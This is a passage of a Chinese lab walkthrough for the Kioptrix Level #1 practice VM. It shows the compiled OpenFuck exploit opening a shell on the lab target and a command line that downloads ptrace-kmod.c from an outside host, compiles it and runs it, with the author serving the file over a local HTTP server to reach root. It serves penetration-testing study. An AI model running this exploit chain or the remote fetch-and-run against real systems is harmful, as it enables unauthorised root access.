47080.c:811:9: warning: ‘RC4_set_key’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]811 |         RC4_set_key(ssl->rc4_write_key, RC4_KEY_LENGTH, ssl->write_key);|         ^~~~~~~~~~~
/usr/include/openssl/rc4.h:35:28: note: declared here35 | OSSL_DEPRECATEDIN_3_0 void RC4_set_key(RC4_KEY *key, int len,|                            ^~~~~~~~~~~
┌──(root㉿kali)-[/home/kali/Kioptix_Level#1]
└─# ls 
47080.c  OpenFuck

脚本编译成功

3.5 执行脚本

┌──(root㉿kali)-[/home/kali/Kioptix_Level#1]
└─# ./OpenFuck 0x6b 192.168.6.164 443 -c 40*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo 
--08:20:03--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!Unable to establish SSL connection.Unable to establish SSL connection.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./exploit: No such file or directory
bash-2.05$ 
bash-2.05$ 
bash-2.05$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-2.05$ whoami
whoami
apache

执行脚本成功。由于编译文件的缺失,导致部分文件未执行成功,所以并没有获得root权限。

3.6 补充

3.6.1 下载ptrace-kmod.c

┌──(root㉿kali)-[/home/kali/Kioptix_Level#1]
└─# wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
--2024-06-08 08:28:04--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
Resolving dl.packetstormsecurity.net (dl.packetstormsecurity.net)... 198.84.60.200
Connecting to dl.packetstormsecurity.net (dl.packetstormsecurity.net)|198.84.60.200|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3921 (3.8K) [text/x-csrc]
Saving to: ‘ptrace-kmod.c’ptrace-kmod.c                                       100%[===================================================================================================================>]   3.83K  --.-KB/s    in 0.02s   2024-06-08 08:28:05 (248 KB/s) - ‘ptrace-kmod.c’ saved [3921/3921]┌──(root㉿kali)-[/home/kali/Kioptix_Level#1]
└─# ls
47080.c  OpenFuck  ptrace-kmod.c

3.6.2 kali开启http服务

┌──(root㉿kali)-[/home/kali/Kioptix_Level#1]
└─# python -m http.server 80  
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

3.6.3 靶机下载ptrace-kmod.c

bash-2.05$ wget 192.168.6.66/ptrace-kmod.c
wget 192.168.6.66/ptrace-kmod.c
--08:37:34--  http://192.168.6.66/ptrace-kmod.c=> `ptrace-kmod.c'
Connecting to 192.168.6.66:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]0K ...                                                   100% @   3.74 MB/s08:37:34 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

3.6.4 再次执行脚本

┌──(root㉿kali)-[/home/kali/Kioptix_Level#1]
└─# ./OpenFuck 0x6b 192.168.6.164 443 -c 40*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f81c8
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo 
--08:39:14--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c=> `ptrace-kmod.c.1'
Connecting to dl.packetstormsecurity.net:443... connected!Unable to establish SSL connection.Unable to establish SSL connection.
gcc: file path prefix `/usr/bin' never used
[+] Attached to 7417
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

成功获得root权限


渗透总结

在Kioptrix Level #1靶场渗透测试中,使用nmap进行主机发现和端口扫描测试,进行扫描目录,使用whatweb信息网页信息搜集取到了关键信息,漏洞搜索,下载paylod编译执行payload文件获得root权限,思路如下:

  • 主机发现
  • 端口扫描
  • 目录扫描
  • 漏洞发现
  • payload利用
  • linux内核提权

参考文章

  • Kioptrix Level #1
  • arp-scan使用
  • nmap详细使用教程
  • 黑客工具之whatweb详细使用教程
  • Kioptrix Level #1

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/24846.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

华为云服务器-云容器引擎 CCE环境构建及项目部署

1、切换地区 2、搜索云容器引擎 CCE 3、购买集群 4、创建容器节点 通过漫长的等待(五分钟左右)&#xff0c;由创建中变为运行中&#xff0c;则表明容器已经搭建成功 购买成功后&#xff0c;返回容器控制台界面 5、节点容器管理 6、创建redis工作负载 7、创建mysql工作负载 8、…

E: 仓库 “http://download...graphics:/darktable/xUbuntu_22.04 InRelease” 没有数字签名

问题 Ubuntu22.04装了darktable软件没装好&#xff0c;已经卸载了但是没卸载干净,终端使用 sudo apt update 出现的问题&#xff1a; 解决&#xff1a; sudo nano /etc/apt/sources.list.d/*darktable*.list找到了该软件的相关仓库条目&#xff1a;直接给他注释掉就行了。

重构大学数学基础_week04_从点积理解傅里叶变换

这周我们来看一下傅里叶变换。傅里叶变换是一种在数学和许多科学领域中广泛应用的分析方法&#xff0c;它允许我们将信号或函数从其原始域&#xff08;通常是时间域或空间域&#xff09;转换到频域表示。在频域中&#xff0c;信号被表示为其组成频率的幅度和相位&#xff0c;这…

Nvidia/算能 +FPGA+AI大算力边缘计算盒子:大疆RoboMaster AI挑战赛

NVIDIA Jetson TX2助力机器人战队斩获RoboMaster AI挑战赛冠亚军 一个汇聚数百万机器人专家与研究人员的赛场&#xff0c;一场兼具工程、策略和团队挑战的较量&#xff0c;说的正是近日刚刚在澳大利亚布里斯本ICRA大会上闭幕的大疆RoboMaster AI挑战赛今年的冠军I Hiter以及亚军…

进程通信(IPC-Inter Process Communication)

进程之间的通信通过内核空间实现 IPC技术 ①管道(匿名管道/命名管道-FIFO队列) ②System V IPC(消息队列、信号量和共享内存) ③套接字(UNIX套接字&Internet套接字) ※信号 软中断&#xff0c;信号提供了一种处理异步事件的方法&#xff0c;作为进程通信的一种机制&am…

LeetCode714买卖股票的最佳时机含手续费

题目描述 给定一个整数数组 prices&#xff0c;其中 prices[i]表示第 i 天的股票价格 &#xff1b;整数 fee 代表了交易股票的手续费用。你可以无限次地完成交易&#xff0c;但是你每笔交易都需要付手续费。如果你已经购买了一个股票&#xff0c;在卖出它之前你就不能再继续购买…

责任链模式(行为型)

目录 一、前言 二、责任链模式 三、总结 一、前言 责任链模式&#xff08;Chain of Responsibility Pattern&#xff09;也叫职责链模式&#xff0c;是一种行为型设计模式&#xff0c;职责链模式使多个对象都有机会处理请求&#xff0c;从而避免请求的发送者和接收者之间的耦…

第二十一讲:编译和链接

第二十一讲&#xff1a;编译和链接 1.翻译环境和运行环境1.1翻译环境1.2编译1.2.1预编译&#xff08;预处理&#xff09;1.2.2编译1.2.2.1词法分析1.2.2.2语法分析1.2.2.3语义分析 1.2.3汇编 1.3链接1.4运行环境1.5#define符号1.5.1#define的使用和原理1.5.2#define使用的陷阱注…

Python学习从0开始——Kaggle机器学习004总结2

Python学习从0开始——Kaggle机器学习004总结2 一、缺失值二、分类变量2.1介绍2.2实现1.获取训练数据中所有分类变量的列表。2.比较每种方法方法1(删除分类变量)方法2(序数编码)方法3独热编码 三、管道3.1介绍3.2实现步骤1:定义预处理步骤步骤2:定义模型步骤3:创建和评估管道 四…

【JAVA】javadoc,如何生成标准的JAVA API文档

目录 1.什么是JAVA DOC 2.标签 3.命令 1.什么是JAVA DOC 当我们写完JAVA代码&#xff0c;别人要调用我们的代码的时候要是没有API文档是很痛苦的&#xff0c;只能跟进源码去一个个的看&#xff0c;一个个方法的猜&#xff0c;并且JAVA本来就不是一个重复造轮子的游戏&#…

探索LLM 在金融领域有哪些潜在应用——通过使用 GPT-4 测试金融工程、市场预测和风险管理等 11 项任务

概述 近年来&#xff0c;用于自然语言理解和生成的人工智能技术在自然语言处理领域取得了突破性进展&#xff0c;OpenAI 的 GPT 和其他大规模语言模型在该领域取得了显著进步。这些模型通过先进的计算能力和算法&#xff0c;展示了处理复杂任务的能力&#xff0c;如理解复杂语…

vue2组件封装实战系列之tag组件

作为本系列的第一篇文章&#xff0c;不会过于的繁杂&#xff0c;并且前期的组件都会是比较简单的基础组件&#xff01;但是不要忽视这些基础组件&#xff0c;因为纵观elementui、elementplus还是其他的流行组件库&#xff0c;组件库的封装都是套娃式的&#xff0c;很多复杂组件…

关于python中的关键字参数

在python语言中存在两种传参方式&#xff1a; 第一种是按照先后顺序来传参&#xff0c;这种传参风格&#xff0c;称为“位置参数”这是各个编程语言中最普遍的方式。 关键字传参~按照形参的名字来进行传参&#xff01; 如上图所示&#xff0c;在函数中使用关键字传参的最大作…

计算机网络 ——网络层(IPv4地址)

计算机网络 ——网络层&#xff08;IPv4地址&#xff09; 什么是IPv4地址IP地址的分类特殊的IP地址 查看自己的IPv4地址 我们今天来看IPv4地址&#xff1a; 什么是IPv4地址 IPv4&#xff08;Internet Protocol version 4&#xff09;是第四版互联网协议&#xff0c;是第一个被…

使用CodeGen进行程序综合推理

Program Synthesis with CodeGen — ROCm Blogs (amd.com) CodeGen是基于标准Transformer的自回归语言模型家族&#xff0c;用于程序合成&#xff0c;正如作者所定义的&#xff0c;它是一种利用输入-输出示例或自然语言描述生成解决指定问题的计算机程序的方法。 我们将测试的…

mqtt-emqx:paho.mqttv5的简单例子

# 安装emqx 请参考【https://blog.csdn.net/chenhz2284/article/details/139551293?spm1001.2014.3001.5502】 # 下面是示例代码 【pom.xml】 <dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-web</…

spark-3.5.1+Hadoop 3.4.0+Hive4.0 分布式集群 安装配置

Hadoop安装参考: Hadoop 3.4.0HBase2.5.8ZooKeeper3.8.4Hive4.0Sqoop 分布式高可用集群部署安装 大数据系列二-CSDN博客 一 下载:Downloads | Apache Spark 1 下载Maven – Welcome to Apache Maven # maven安装及配置教程 wget https://dlcdn.apache.org/maven/maven-3/3.8…

mqtt-emqx:简单安装emqx

安装依赖 yum install -y epel-release libatomic下载 cd /chz/install/emqx wget https://www.emqx.com/en/downloads/broker/5.7.0/emqx-5.7.0-el7-amd64.tar.gz解压 mkdir -p emqx && tar -zxvf emqx-5.7.0-el7-amd64.tar.gz -C emqx后台运行 cd /chz/install/e…

分布式事务Seata中XA和AT模式介绍

Seata中XA和AT模式介绍 分布式事务介绍分布式解决方案解决分布式事务的思路Seata的架构Seata中的XA模式Seata的XA模型流程XA模式优缺点实现XA模式 Seata中的AT模式Seata中的AT模式流程实现AT模式AT模式优缺点 AT模式与XA模式的区别 分布式事务介绍 分布式事务&#xff0c;就是…

代码随想录算法训练营第36期DAY50

DAY50 如果写累了就去写套磁信吧。 198打家劫舍 class Solution {public: int rob(vector<int>& nums) { vector<int> dp(nums.size()); dp[0]nums[0]; if(nums.size()1) return nums[0]; dp[1]max(nums[0],nums[1]); …